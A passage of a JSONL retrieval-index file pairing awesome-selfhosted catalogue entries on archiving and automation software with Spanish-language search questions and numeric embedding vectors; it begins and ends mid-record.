-0.07892, 0.17934, -0.0683, 0.10537, -0.06147, -0.05836, 0.06248, 0.01729, 0.03352, 0.02467, 0.0277, -0.15618, 0.0201, -0.12256, 0.12633, -0.16343, 0.09939, -0.04266, 0.05533, -0.03077, 0.06268, -0.12923, -0.00807, -0.00596, 0.01006, -0.14188, -0.09169, 0.018, 0.04745, 0.00458, -0.0098, -0.04226, -0.03962, 0.07778, -0.0835, -0.01622, 0.01184, -0.00935, 0.09944, 0.07703, -0.09002, 0.07813, 0.04607, -0.04236, -0.03307, 0.00576, 0.00989, -0.10109, 0.09479, -0.02552, 0.0549, 0.1485, -0.10129, -0.02124, 0.03253, 0.04346, 0.04408, -0.0941, 0.00577, -0.047, 0.00281, -0.11931, -0.01997, 0.09054, 0.12691, 0.0037, 0.0049, -0.01768, -0.02775, 0.05454, -0.00636, 0.00311, 0.02662, -0.09583, 0.00511, 0.01722, 0.05664, -0.08296, -0.07179, -0.02029, 0.02825, 0.06491, 0.06397, 0.07331, 0.02368, 0.08679, 0.04704, 0.00389, -0.02003, 0.14036, 0.02789, 0.01655, -0.06851, -0.09201, 0.05723, 0.05337, -0.01248, 0.02226, -0.0447, -0.01756, 0.04761, 0.03686, -0.14695, -0.00333, 0.0424, 5e-05, 0.05355, -0.02012, -0.03426, 0.00214, 0.05219, -0.06955, 0.03399, 0.01009, -0.07927, -0.02186, -0.01565, 0.0575, -0.11126, -0.03005, -0.07349, -0.03798, -0.04704, 0.00542, -0.12761, -0.00978, -0.03003, -0.04081, 0.02689, -0.03433, 0.00837, -0.03724, 0.04224, -0.02843, 0.10201, 0.00046, 0.02027, -0.01101, 0.01004, 0.01605, -0.03958, -0.03594, -0.00123, -0.03088, 0.03556, -0.00548, 0.0228, -0.01545, -0.02727, 0.03148, -0.05281, -0.10501, 0.05039, -0.00256, 0.01168, 0.01004, -0.00802, 0.07089, 0.02118, -0.06037, -0.00105, 0.05192, -0.00755, -0.04524, -0.0128, 0.00342, 0.00855, 0.04992, 0.00863, -0.04387, -0.02784, 0.02936, 0.03453, 0.04766, 0.03542, -0.08443, 0.04028, 0.01207, -0.03643, 0.00872, 0.02622, -0.00965, -0.02103, -0.07936, -0.02602, -0.03021, 0.03203, -0.02776, 0.04048, -0.02149, -0.06183, -0.08348, 0.07165, -0.0148, -0.09799, 0.04262, 0.02896, 0.04236, -0.04169, -0.07196, -0.00279]} +{"tipo": "pregunta", "herramienta": "Archiving and Digital Preservation (DP)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Archiving and Digital Preservation (DP)", "tema": "archiving and digital preservation (dp)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Archiving and Digital Preservation (DP): Eonvelope β€” Email archiving software that allows you to preserve your emails for an indefinite long period of time [AGPL-3.0, K8S/Docker]. Ganymede β€” Twitch VOD and live stream archiving platform. Includes a rendered chat for each archive [⚠, GPL-3.0, Docker]. mail-archiver β€” Web application for archiving, searching, and exporting emails from multiple accounts (IMAP, M365 or Import). Featuring folder sync, attachment support, mailbox migration and a dashboard [GPL-3.0, Docker]. Omeka S β€” Next-generation web publishing platform for institutions interested in connecting digital cultural heritage collections with other resources online [GPL-3.0, Nodejs]. Open Archiver β€” Email archiving solution with full-text search and eDiscovery search features [AGPL-3.0, Docker]. Piler β€” Feature-rich email archiving solution [GPL-3.0, C/Docker/deb]. Wallabag β€” Wallabag, formerly Poche, is a web application allowing you to save articles to read them later with improved readability [MIT, PHP].", "indexar": "cual es una alternativa libre para almacenar artΓ­culos web para leerlos mΓ‘s tarde?", "v": [0.02843, 0.05697, -0.08955, 0.00123, -0.09597, -0.02247, -0.03314, 0.02356, -0.12189, -0.08023, -0.08495, -0.16078, -0.03739, -0.10275, 0.17264, 0.0298, 0.04115, -0.04253, 0.09007, -0.06498, -0.11436, 0.06452, -0.18916, -0.04158, -0.07878, -0.12714, 0.03173, -0.04542, -0.11155, 0.11334, -0.11711, 0.10083, 0.08372, 0.04008, -0.01632, 0.12836, 0.16911, 0.06093, -0.05126, 0.01603, 0.07248, 0.01677, -0.05681, 0.0671, -0.09444, -0.04496, 0.01582, -0.01924, -0.00412, 0.04128, 0.01851, 0.01179, 0.03788, 0.08655, 0.06373, 0.00745, 0.18171, -0.02733, 0.03396, 0.00764, -0.03944, 0.16725, 0.07065, -0.06891, -0.06634, 0.00773, -0.12984, 0.10543, -0.10797, 0.0619, -0.06251, -0.00052, 0.08057, -0.02892, -0.07306, 0.09166, -0.02331, 0.08151, -0.00851, 0.0984, 0.00657, -0.11048, 0.02685, 0.0598, 0.01042, -0.06185, 0.04289, -0.1188, 0.05251, 0.04143, 0.07376, 0.03448, -0.02681, 0.06969, -0.0487, -0.17429, 0.12041, 0.08435, -0.03424, 0.00458, 0.04438, 0.03686, -0.01338, -0.02207, 0.06059, -0.03144, -0.09739, 0.04113, -0.03292, 0.04261, 0.06585, 0.02293, 0.00103, -0.02747, 0.04414, 0.08865, -0.01795, 0.03584, 0.01026, -0.07495, -0.03629, 0.01297, -0.03618, -0.00671, 0.13447, 0.0558, 0.05403, -0.0507, -0.07254, 0.00736, -0.0093, -0.07838, -0.09824, -0.03726, -0.04593, -0.01985, 0.05579, -0.03084, -0.02205, -0.00444, -0.02825, -0.03629, -0.04364, 0.04619, 0.04089, -0.02389, 0.04986, 0.05522, -0.05209, -0.09182, -0.03084, -0.01094, 0.00656, -0.01636, -0.01569, 0.01894, -0.0638, -0.10415, -0.09191, 0.04964, -0.01756, 0.06818, 0.03778, 0.02706, -0.05547, -0.07981, -0.01064, -0.0465, -0.06062, -0.01224, 0.02599, 0.04104, 0.00707, -0.09046, 0.06005, -0.03591, -0.04518, -0.00892, 0.05961, 8e-05, -0.0746, 0.01505, -0.06088, 0.07442, -0.01756, -0.06614, 0.05041, 0.0544, -0.03628, 0.05331, -0.03473, 0.01555, -0.04769, -0.01704, -0.01744, -0.00218, 0.00046, -0.08821, 0.0215, 0.0418, -0.07901, -0.0507, -0.03574, -0.00388, -0.07725, -0.02513, -0.07578, 0.01386, -0.01642, 0.02658, 0.02584, 0.00954, 0.03473, -0.06169, -0.05634, -0.05443, -0.05513, 0.00276, -0.04771, 0.01637, 0.04661, -0.00335, 0.02891, 0.02549, -0.01686, 0.05656, 0.02287, 0.10238, 0.02864, 0.04698, -0.04512, 0.0124, -0.01872, 0.02882, 0.04224, 0.01286, -0.03274, 0.03412, 0.00221, 0.02043, 0.03072, 0.08577, -0.02496, 0.00356, -0.01641, 0.00537, -0.12642, 0.01145, -0.06876, -0.09334, -0.04381, 0.03405, -0.0075, -0.02241, 0.05559, 0.01046]} +{"tipo": "pregunta", "herramienta": "Archiving and Digital Preservation (DP)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Archiving and Digital Preservation (DP)", "tema": "archiving and digital preservation (dp)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Archiving and Digital Preservation (DP): Wayback β€” A self-hosted toolkit for archiving webpages to the Internet Archive, archive.today, IPFS, and local file systems [GPL-3.0, Go].", "indexar": "con que programa puedo archivar pΓ‘ginas web en el Internet Archive y en mis archivos locales", "v": [-0.03388, 0.01571, 0.05068, -0.24332, -0.08124, -0.14297, 0.05758, -0.03478, -0.13806, 0.02864, 0.00314, -0.10951, 0.00691, 0.01574, 0.09189, 0.01716, 0.14263, -0.06338, 0.16448, -0.06821, -0.03502, 0.13055, -0.07241, 0.04387, -0.05551, -0.11683, 0.00099, 0.05724, -0.05461, 0.06193, -0.14993, 0.07374, 0.02412, 0.02256, -0.07659, 0.03715, 0.13111, 0.15044, -0.14256, -0.05245, 0.0573, -0.00087, -0.14544, 0.06547, 0.00419, -0.00783, -0.00817, -0.06219, 0.04336, -0.02737, -0.02964, -0.0698, -0.03934, 0.0836, -0.02193, -0.03129, 0.02189, -0.17132, 0.02993, 0.04606, -0.09551, 0.06275, -0.03049, -0.00658, -0.00752, 0.06553, -0.0261, 0.04396, -0.1276, 0.10251, 0.05554, 0.13228, 0.11394, -0.02549, 0.02001, -0.00809, -0.03175, -0.00124, -0.04546, -0.03058, 0.00485, -0.00335, 0.0582, 0.0496, -0.13548, -0.04721, -0.04382, -0.07953, 0.0165, -0.06421, 0.05133, 0.01588, -0.04038, -0.02553, 0.00466, -0.12952, 0.104, 0.03228, 0.03107, -0.0521, -0.07504, 0.03651, -0.0764, 0.07704, 0.0932, 0.07629, 0.07344, 0.11637, 0.02102, -0.05605, 0.07889, 0.00065, 0.03045, 0.053, -0.11303, 0.0597, 0.06616, 0.0506, 0.06996, -0.02312, -0.04309, -0.00164, -0.05876, 0.01602, 0.03564, 0.06321, 0.01786, 0.06223, -0.06108, 0.00293, 0.05847, 0.03663, -0.03862, -0.04613, -0.03234, -0.03317, 0.00712, 0.02982, 0.00919, -0.03417, 0.08867, -0.04614, -0.07239, 0.08689, 0.08404, -0.02595, -0.0122, 0.01833, -0.11236, -0.10483, -0.08605, -0.02647, -0.01626, 0.00305, -0.06444, 0.06468, 0.02483, -0.05281, 0.00845, 0.00567, -0.06601, 0.04434, 0.02347, 0.00735, -0.02849, -0.02536, -0.06712, 0.09875, 0.05588, 0.00978, -0.00713, 0.05516, -0.04313, -0.11828, -0.02361, 0.04817, -0.01967, -0.03831, 0.08423, 0.0018, -0.041, -0.00773, 0.06684, 0.07138, -0.0638, -0.02837, 0.02927, -0.03529, -0.05161, -0.00102, -0.00041, -0.05498, -0.0909, 0.10924, -0.01545, -0.00341, -0.10061, 0.04519, 0.0226, -0.02278, -0.04659, -0.05399, -0.0372, 0.04089, 0.00233, 0.07771, -0.02849, -0.0292, 0.00622, 0.03252, -0.0561, -0.05763, 0.02603, -0.04532, -0.05904, -0.04725, 0.05943, -0.03181, -0.01764, 0.00399, 0.0512, -0.00753, 0.05394, 0.04705, 0.06971, -0.04974, 0.0198, -0.03823, 0.01386, -0.00645, -0.06537, -0.04863, -0.05037, 0.00283, 0.01104, -0.04418, 0.02199, 0.01036, -0.0538, -0.03134, -0.04932, 0.04692, 0.00502, 0.02296, 0.01542, -0.03206, -0.07403, 0.00881, 0.0725, 0.0186, -0.03776, 0.03696, 0.00428, 0.00044, 0.01006, 0.06798]} +{"tipo": "pregunta", "herramienta": "Archiving and Digital Preservation (DP)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Archiving and Digital Preservation (DP)", "tema": "archiving and digital preservation (dp)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Archiving and Digital Preservation (DP): Wayback β€” A self-hosted toolkit for archiving webpages to the Internet Archive, archive.today, IPFS, and local file systems [GPL-3.0, Go].", "indexar": "cual es una herramienta libre para guardar copias de sitios web y sistemas de archivos", "v": [0.0197, 0.01944, -0.06319, -0.14994, -0.042, -0.23168, -0.00456, -0.02647, -0.04897, -0.07106, -0.06852, -0.11331, -0.03461, 0.02287, 0.13006, 0.03441, 0.17055, -0.10563, 0.02353, 0.00037, -0.03987, 0.04296, -0.0227, -0.03147, -0.13537, -0.04331, 0.12343, -0.0504, -0.19803, 0.12443, 0.02819, 0.02425, 0.10287, -0.04685, -0.10943, -0.02851, 0.07199, 0.05529, -0.08898, -0.03692, 0.03236, 0.01698, -0.10934, 0.11613, -0.04275, -0.09606, -0.03311, -0.00301, 0.04492, -0.00168, -0.05635, -0.10829, -0.13285, -0.00537, -0.0082, -0.15161, 0.19411, -0.11255, 0.06634, 0.02722, -0.15719, 0.14561, -0.01822, -0.01068, -0.00457, -0.01622, -0.0525, -0.00808, -0.14902, 0.06749, 0.01469, 0.08744, 0.12112, 0.02397, 0.02767, 0.00268, 0.00431, -0.00695, -0.0666, 0.03236, 0.02219, -0.0898, -0.06803, 0.05475, -0.05271, -0.11045, 0.02382, -0.02452, -0.00196, -0.04482, 0.07179, 0.01663, -0.03714, 0.05245, 0.0037, -0.14299, 0.06149, 0.05668, -3e-05, 0.00727, 0.04313, -0.03274, -0.06222, 0.0407, -0.03079, 0.0674, 0.01667, 0.01691, -0.00878, -0.03124, 0.05335, 0.00609, -0.01622, 0.04496, -0.11226, 0.00287, 0.08392, -0.02065, 0.01554, -0.02383, 0.00466, 0.02234, -0.09813, -0.04736, 0.02095, -0.0144, 0.04732, 0.09809, -0.09957, -0.08505, 0.02991, 0.01791, -0.11644, 0.03425, -0.01869, -0.03548, 0.00227, -0.04422, 0.00266, -0.06676, -0.02665, 0.04731, -0.07246, -0.01672, 0.04667, 0.05358, 0.04013, -0.04214, -0.08679, -0.07347, -0.05336, 0.00189, -0.01246, -0.02229, -0.01831, 0.05204, -0.04197, -0.12106, -0.07322, 0.02654, -0.02615, 0.04769, 0.03952, -0.01731, -0.01208, -0.04117, -0.00155, 0.08068, 0.06227, 0.02438, 0.04258, 0.05121, 0.01053, -0.13221, 0.02085, -0.0607, -0.06551, -0.05535, 0.04185, -0.06731, -0.05741, 0.00664, -0.03452, 0.02616, -0.01854, -0.03616, 0.0656, 0.0133, -0.00563, 0.07665, 0.01412, 0.00564, -0.05797, -0.02531, 0.05331, 0.0212, -0.04728, -0.0307, 0.0704, 0.0169, -0.07944, -0.05162, -0.04394, -0.04637, 0.00036, 0.05018, -0.04009, -0.03633, -0.02825, 0.00347, 0.00205, 0.01613, 0.02641, -0.07561, -0.05273, -0.08002, 0.0214, 0.00546, -0.04376, -0.05224, 0.08561, 0.04124, 0.05842, 0.00498, 0.02628, 0.0083, 0.04725, 0.0258, 0.01198, -0.0037, -0.02593, -0.00443, -0.0109, -0.00761, 0.07167, -0.02302, 0.01815, -0.01481, -0.06325, -0.05122, -0.0121, 0.10817, -0.02075, -0.03457, -0.04072, -0.06385, -0.06718, -0.01672, 0.01588, -0.07234, -0.02416, 0.00206, 0.015, -0.03081, 0.01175, -0.03089]} +{"tipo": "pregunta", "herramienta": "Archiving and Digital Preservation (DP)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Archiving and Digital Preservation (DP)", "tema": "archiving and digital preservation (dp)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Archiving and Digital Preservation (DP): Wayback β€” A self-hosted toolkit for archiving webpages to the Internet Archive, archive.today, IPFS, and local file systems [GPL-3.0, Go].", "indexar": "que software sirve para preservar archivos digitales y subirlos a Wayback e IPFS", "v": [0.00171, -0.08382, -0.17245, -0.1265, -0.00087, -0.23721, -0.0467, -0.14347, -0.09463, -0.024, 0.01141, -0.20229, -0.05477, -0.1471, -0.02699, -0.06916, 0.09666, -0.05662, 0.03779, -0.08679, 0.03621, 0.13209, -0.12607, -0.20288, 0.04624, 0.01228, -0.0718, 0.03428, -0.15037, -0.03508, 0.05989, -0.00411, 0.01635, -0.05078, -0.14541, -0.11179, 0.04255, 0.13528, -0.00286, -0.01636, 0.07696, 0.04973, -0.00798, 0.05781, -0.04297, -0.06899, 0.05433, -0.07593, 0.05176, -0.02538, -0.03442, -0.11282, 0.03961, 0.03136, -0.08964, -0.03712, 0.03193, -0.07011, -0.00243, -0.03907, -0.11839, 0.15189, -0.02326, -0.03378, 0.06329, -0.09076, -0.06382, -0.00812, -0.16883, 0.06007, 0.04023, 0.07598, 0.09549, -0.0008, -0.00724, 0.00382, -0.01926, -0.02281, -0.03255, -0.02142, 0.00483, 0.02042, -0.04291, 0.06762, -0.12363, -0.14114, -0.03429, -0.0705, 0.03485, -0.02795, 0.01582, 0.07045, 0.00097, -0.0098, 0.05062, -0.02057, 0.09477, 0.04503, -0.05506, 0.02491, 0.00787, -0.05776, -0.0173, 0.0906, 0.01327, 0.05758, 0.06783, -0.04479, 0.00163, 0.07083, -3e-05, 0.09373, 0.0762, 0.00285, -0.00839, 0.05999, 0.05151, -0.12477, 0.03718, 0.04288, 0.12546, -0.01507, -0.01467, -0.06013, 0.046, 0.10511, 0.01681, 0.03975, -0.064, -0.05563, 0.01507, -0.06065, -0.04487, -0.00637, 0.0005, -0.00299, -0.00012, 0.00901, -0.01731, 0.016, 0.07335, 0.00299, -0.07019, -0.01925, 0.08647, -0.04684, 0.00015, -0.06582, -0.06856, -0.0855, -0.01659, -0.03943, -0.06645, -0.03081, -0.08623, 0.01245, -0.04763, -0.11084, -0.10663, 0.05423, -0.0616, 0.02172, 0.05037, 0.01161, -0.03457, -0.02546, -0.01905, 0.04531, 0.05639, -0.05021, -0.031, 0.03385, 0.02724, -0.11329, -0.0209, -0.01422, -0.04815, 0.00061, 0.04906, -0.01525, -0.03413, -0.05687, 0.07168, 0.05904, -0.02804, -0.01097, 0.03941, -0.01242, -0.06247, 0.01983, 0.00431, -0.0214, -0.08656, 0.02363, 0.04036, -0.06383, -0.04932, 0.05445, 0.00295, -0.01178, -0.05979, -0.04622, -0.03184, 0.00837, 0.04221, 0.00504, 0.01198, 0.01827, 0.00933, 0.02498, -0.03872, -0.05448, 0.04816, -0.02362, -0.05915, -0.02846, -0.0233, 0.07382, -0.05369, 0.02263, 0.0297, -0.03944, 0.01388, -0.00255, 0.03431, 0.01945, -0.00042, -0.00044, -0.0402, -0.09419, -0.02638, -0.03576, -0.01316, 0.01214, 0.0047, 0.02115, 0.00757, 0.01253, -0.06735, -0.05369, -0.03334, 0.05561, -0.00305, 0.0159, -0.03336, -0.07013, -0.06111, 0.01961, 0.04565, -0.00444, 1e-05, -0.02183, -0.04302, 0.03925, -0.05731, 0.02474]} +{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Activepieces β€” No-code business automation tool like Zapier or Tray. For example, you can send a Slack notification for each new Trello card [MIT, Docker]. Apache Airflow β€” Platform to programmatically author, schedule, and monitor workflows [Apache-2.0, Python/Docker]. Automatisch β€” Business automation tool that lets you connect different services like Twitter, Slack, and more to automate your business processes (alternative to Zapier) [AGPL-3.0, Docker]. BookBounty β€” Retrieve missing Readarr books from Library Genesis [⚠, MPL-2.0, Docker]. changedetection.io β€” Stay up-to-date with web-site content changes [Apache-2.0, Python/Docker]. ChiefOnboarding β€” Employee onboarding platform that allows you to provision user accounts and create sequences with todo items, resources, text/email/Slack messages, and more! Available as a web portal and Slack bot [AGPL-3.0, Docker]. Cronicle β€” Simple, distributed task scheduler and runner with a web based UI [MIT, Nodejs].", "indexar": "ΒΏcon quΓ© programa puedo crear automatizaciones de negocio sin escribir cΓ³digo?", "v": [-0.13558, 0.05154, -0.05907, -0.12005, 0.03387, -0.23407, -0.02037, -0.02441, -0.24538, -0.14749, -0.04313, -0.20402, -0.00119, -0.093, 0.04378, 0.04935, 0.16893, -0.04555, 0.10145, 0.03459, 0.07279, -0.09105, -0.00286, -0.08002, -0.00667, -0.13773, 0.04398, -0.0151, -0.10505, 0.08291, -0.03954, 0.03375, 0.16441, -0.03236, 0.01866, 0.06171, 0.16034, 0.09347, 0.02806, 0.073, 0.0552, 0.094, -0.02997, 0.07034, 0.06091, 0.01216, 0.11937, -0.01263, -0.09232, -0.01041, 0.00681, -0.08601, -0.01722, -0.06845, 0.09327, 0.01123, 0.01057, -0.07747, -0.02941, 0.01969, 0.10876, 0.00796, 0.02379, -0.08927, -0.04959, -0.00392, 0.11512, -0.00199, 0.00425, 0.13374, -0.01154, -0.03352, -0.06583, -0.03659, 0.12203, 0.0705, -0.04311, -0.05949, -0.03913, 0.02308, -0.00469, 0.02349, -0.05224, 0.03692, 0.05517, -0.01234, -0.08326, -0.02364, -0.01073, -0.0392, 0.06356, -0.00747, 0.04629, 0.00032, 0.07524, 0.0399, 0.08587, -0.02387, -0.02751, 0.1378, -0.01205, -0.06186, -0.09212, 0.07187, 0.05122, 0.07778, 0.06955, 0.00402, 0.02624, 0.02667, -0.06769, -0.06531, -0.09256, -0.0229, -0.10897, 0.01342, -0.00066, 0.04815, 0.02359, -0.06571, -0.08115, 0.07793, -0.06576, 0.03037, 0.05481, 0.04325, 0.0092, 0.169, -0.04841, -0.00784, -0.00821, 0.01551, -0.0014, -0.06113, 0.02864, 0.06943, 0.03016, 0.03876, -0.01304, -0.05533, -0.01375, -0.02124, -0.04215, 0.05628, -0.00318, 0.03025, 0.01547, -0.15038, -0.05345, 0.05165, -0.00589, 0.06437, -0.01929, -0.008, -0.08883, 0.02143, 0.07116, -0.00259, -0.05753, 0.02284, -0.04804, 0.0508, -0.03918, -0.04263, 0.03048, -0.00985, -0.02693, -0.00895, 0.04659, 0.07271, -0.05643, 0.05193, 0.12506, -0.08037, 0.03614, 0.01728, -0.00541, -0.02718, -0.04508, -0.02878, -0.06858, 0.01444, 0.04691, -0.02131, 0.02026, 0.01531, 0.05427, 0.02419, -0.01312, 0.01475, -0.05819, -0.00914, -0.02436, -0.05285, -0.00383, -0.00774, 0.01001, 0.00698, 0.04315, -0.10468, -0.05917, 0.01024, 0.01523, 0.02772, 0.01118, 0.07519, -0.03109, 0.00708, 0.04627, 0.03898, 0.03098, -0.04017, 0.01698, 0.0334, -0.04306, -0.01316, -0.0707, 0.05497, 0.09869, -0.01272, 0.02663, -0.05195, -0.0097, 0.00187, 0.03431, -0.03053, 0.01387, 0.06189, 0.03478, 0.02901, -0.04843, -0.02785, -0.01646, 0.02664, 0.01181, 0.00192, -0.02041, -0.00769, -0.03975, -0.02514, 0.01256, 0.02374, 0.00296, -0.08754, -0.00922, 0.0423, -0.052, -0.02723, -0.07211, -0.00273, -0.05609, -0.00688, -0.01102, -0.03663, 0.0456, 0.08681]} +{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Activepieces β€” No-code business automation tool like Zapier or Tray. For example, you can send a Slack notification for each new Trello card [MIT, Docker]. Apache Airflow β€” Platform to programmatically author, schedule, and monitor workflows [Apache-2.0, Python/Docker]. Automatisch β€” Business automation tool that lets you connect different services like Twitter, Slack, and more to automate your business processes (alternative to Zapier) [AGPL-3.0, Docker]. BookBounty β€” Retrieve missing Readarr books from Library Genesis [⚠, MPL-2.0, Docker]. changedetection.io β€” Stay up-to-date with web-site content changes [Apache-2.0, Python/Docker]. ChiefOnboarding β€” Employee onboarding platform that allows you to provision user accounts and create sequences with todo items, resources, text/email/Slack messages, and more! Available as a web portal and Slack bot [AGPL-3.0, Docker]. Cronicle β€” Simple, distributed task scheduler and runner with a web based UI [MIT, Nodejs].", "indexar": "quΓ© herramienta sirve para programar y monitorear flujos de trabajo complejos", "v": [0.13538, 0.045, -0.20181, -0.2566, 0.10533, -0.14939, 0.02723, -0.0026, -0.03534, -0.12692, -0.0365, 0.01894, 0.04623, -0.08154, 0.08515, 0.01043, 0.09929, -0.2006, -0.06748, 0.08656, -0.06461, 0.01634, -0.14306, -0.07431, -0.10479, -0.00941, 0.03955, 0.00034, -0.13544, 0.06267, -0.01956, 0.09022, 0.17234, -0.15609, 0.00447, -0.05796, -0.05889, 0.05358, -0.06831, 0.05804, -0.03089, 0.08078, -0.03296, -0.02775, 0.04054, -0.00728, 0.02228, -0.07665, 0.04084, 0.04997, -0.08735, 0.03054, -0.05333, 0.03087, 0.02088, -0.13781, 0.12413, -0.08792, 0.02018, -0.08535, -0.03637, 0.10693, -0.01272, -0.06125, 0.0081, -0.00899, 0.08274, -0.03932, -0.06475, 0.05366, -0.08608, 0.08654, -0.03209, -0.01908, 0.04226, 0.0238, -0.04167, -0.00948, 0.11004, -0.00637, -0.01016, 0.04995, -0.01532, 0.03265, -0.08127, -0.0585, 0.05373, -0.01852, -0.05846, -0.05891, -0.07499, 0.08272, 0.00422, 0.00432, 0.09093, 0.08626, 0.14558, 0.049, -0.01153, 0.00478, 0.13144, -0.09107, -0.05551, 0.02689, -0.05431, 0.09153, 0.02812, -0.03119, -0.07341, -0.04863, -0.00638, 0.06968, -0.0612, 0.00492, -0.0383, 0.0292, -0.03186, -0.01059, 0.0303, -0.04834, 0.00694, 0.05186, -0.03031, -0.01608, 0.01151, -0.05911, 0.02592, 0.08032, -0.0215, -0.02045, -0.0336, -0.03233, -0.12759, 0.00728, -0.04254, -0.00461, 0.06957, -0.11003, 0.0434, -0.0666, -0.00308, 0.06981, 0.02639, -0.00015, 0.04876, 0.06862, 0.12348, -0.03644, -0.06814, -0.03103, 0.0283, -0.02159, 0.05038, 0.02942, -0.09076, 0.00315, -0.01554, 0.05485, -0.09827, 0.02072, -0.04097, -0.01645, 0.04123, 0.05378, 0.00033, -0.04109, -0.03851, -0.01834, 0.12014, 0.07817, 0.01409, 0.01537, 0.09084, -0.09644, 0.00812, -0.03718, -0.05364, -0.03573, -0.03202, -0.004, -0.06232, 0.08705, -0.02331, 0.00994, -0.01626, -0.00051, 0.01088, -0.02726, 0.0008, 0.04384, 0.02334, 0.05961, -0.01303, -0.08426, 0.0437, -0.01497, -0.01668, -0.08864, 0.00699, 0.00092, 0.01025, -0.0396, 0.00119, -0.03733, 0.03174, 0.12822, -0.06248, 0.03034, 0.02453, 0.08785, 0.0511, -0.03406, 0.01013, 0.00993, -0.00218, -0.01434, 0.02032, 0.05023, 0.01327, 0.02788, 0.05822, -0.03389, 0.01619, -0.02556, -0.0335, -0.01509, 0.03333, 0.04714, 0.01685, -0.01504, 0.01605, 0.00196, -0.07379, -0.02302, -0.04075, 0.0027, -0.00194, 0.01141, -0.00405, -0.06687, -0.01499, 0.03759, -0.01306, -0.07694, -0.02521, -0.06663, -0.02995, -0.01625, -0.03984, -0.06482, -0.05749, 0.02916, 0.03652, -0.0171, 0.04656, -0.01735]} +{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Activepieces β€” No-code business automation tool like Zapier or Tray. For example, you can send a Slack notification for each new Trello card [MIT, Docker]. Apache Airflow β€” Platform to programmatically author, schedule, and monitor workflows [Apache-2.0, Python/Docker]. Automatisch β€” Business automation tool that lets you connect different services like Twitter, Slack, and more to automate your business processes (alternative to Zapier) [AGPL-3.0, Docker]. BookBounty β€” Retrieve missing Readarr books from Library Genesis [⚠, MPL-2.0, Docker]. changedetection.io β€” Stay up-to-date with web-site content changes [Apache-2.0, Python/Docker]. ChiefOnboarding β€” Employee onboarding platform that allows you to provision user accounts and create sequences with todo items, resources, text/email/Slack messages, and more! Available as a web portal and Slack bot [AGPL-3.0, Docker]. Cronicle β€” Simple, distributed task scheduler and runner with a web based UI [MIT, Nodejs].", "indexar": "cual es una alternativa libre a Zapier para conectar diferentes servicios", "v": [-0.02593, 0.15568, -0.1879, -0.01987, -0.02003, -0.06682, -0.03272, -0.05651, -0.11923, -0.07579, -0.05228, -0.16929, -0.04919, 0.0109, 0.06512, -0.0097, 0.06277, -0.03108, 0.16428, 0.01024, -0.00927, 0.08876, -0.0772, -0.17889, -0.09805, -0.00138, 0.0797, -0.08514, -0.15136, 0.08322, 0.0041, -0.0921, 0.04313, 0.04596, -0.0086, -0.00645, 0.21512, 0.14442, 0.15465, -0.0452, -0.0474, -0.00775, 0.02574, 0.12139, 0.0207, 0.00357, -0.04939, 0.00544, 0.03952, 0.09609, -0.11715, 0.04631, -0.11947, -0.07156, 0.02191, -0.07459, 0.05068, -0.11617, -0.04907, -0.05909, -0.03277, 0.08503, -0.00392, -0.0097, 0.09915, -0.04431, -0.07749, -0.02987, -0.04559, 0.08746, 0.05614, -0.02575, -0.00908, -0.06994, -0.10123, 0.12703, -0.02029, -0.05616, -0.01995, 0.09886, 0.06284, -0.01144, 0.00325, 0.05063, -0.04335, -0.00066, 0.01336, -0.06646, 0.03708, 0.05121, 0.10326, 0.05458, -0.0203, 0.04998, -0.08724, -0.05259, -0.01464, 0.04016, -0.00177, 0.02557, 0.12057, 0.08268, -0.11672, 0.09748, -0.08695, -0.09104, 0.04322, 0.04534, -0.08055, -0.01277, -0.04247, -0.00164, 0.02416, -0.01542, -0.02872, -0.07195, -0.02108, -0.03569, 0.03621, 0.0178, -0.05512, -0.04992, -0.00758, -0.03778, -0.01036, 0.04672, 0.05493, 0.0184, -0.00106, 0.08959, 0.102, -0.00608, -0.05283, -0.12827, -0.06314, -0.04084, 0.08028, -0.06466, 0.0177, -0.02624, 0.02322, 0.02271, 0.0136, -0.05567, -0.0152, -0.05242, 0.00312, -0.05018, 0.02652, -0.03537, -0.0506, 0.05768, -0.11734, 0.08051, -0.03509, -0.02265, -0.05854, -0.02793, -0.06888, 0.12153, 0.02968, -0.06955, 0.06075, -0.00872, 0.00287, -0.01049, -0.04477, -0.00655, 0.02425, -0.00093, -0.00687, 0.10015, 0.04019, -0.05962, 0.04468, -0.03676, -0.03619, -0.08677, 0.08107, -0.07044, -0.00593, 0.03, -0.0865, -0.0275, 0.03422, -0.01365, -0.01537, -0.02208, 0.02108, 0.00038, -0.04273, -0.01643, -0.06286, -0.05295, -0.00512, -0.05829, 0.00599, -0.12689, -0.07759, -0.00695, -0.07309, -0.00768, -0.01019, -0.00182, -0.02288, 0.02076, 0.02495, 0.03453, -0.00402, 0.05762, 0.07366, -0.00395, 0.13461, -0.01507, -0.05895, 0.00348, -0.00664, -0.06013, 0.02898, 0.07033, 0.00848, 0.00089, -0.02046, -0.01669, -0.01272, 0.01579, 0.04878, 0.01793, -0.0153, 0.01118, -0.0024, 0.00954, -0.01721, 0.01529, -0.0082, -0.00661, 0.01684, 0.02293, 